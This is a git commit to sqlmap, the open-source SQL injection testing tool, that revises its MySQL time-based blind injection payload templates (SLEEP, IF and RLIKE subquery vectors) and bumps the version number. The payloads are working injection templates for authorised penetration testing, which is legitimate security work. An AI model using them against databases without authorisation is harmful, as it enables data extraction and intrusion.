Minor revisiting of MySQL time-based payloads

stamparm · stamparm · commit e1ab969fcedd · 2019-05-20T12:41:41.000+02:00
diff --git a/lib/core/settings.py b/lib/core/settings.py
@@ -18,7 +18,7 @@
 from thirdparty.six import unichr as _unichr
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.3.5.114"
+VERSION = "1.3.5.115"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/xml/payloads/time_blind.xml b/xml/payloads/time_blind.xml
@@ -2,16 +2,18 @@
 
 <root>
     <!-- Time-based boolean tests -->
+
+    <!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
     <test>
-        <title>MySQL &gt;= 5.0.12 AND time-based blind</title>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
         <stype>5</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,8,9</clause>
         <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>AND SLEEP([SLEEPTIME])</payload>
+            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -23,15 +25,15 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.0.12 OR time-based blind</title>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
         <stype>5</stype>
         <level>1</level>
         <risk>3</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>OR SLEEP([SLEEPTIME])</payload>
+            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -43,16 +45,15 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>
         <stype>5</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
             <payload>AND SLEEP([SLEEPTIME])</payload>
-            <comment>#</comment>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -64,16 +65,15 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>
         <stype>5</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>3</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
         <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
             <payload>OR SLEEP([SLEEPTIME])</payload>
-            <comment>#</comment>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -85,15 +85,16 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>
         <stype>5</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3,8,9</clause>
+        <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>AND SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -105,15 +106,16 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>
         <stype>5</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>3</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>OR SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -131,9 +133,9 @@
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -152,9 +154,9 @@
         <risk>3</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -296,9 +298,9 @@
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -316,9 +318,9 @@
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -1490,9 +1492,9 @@
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>3</where>
-        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
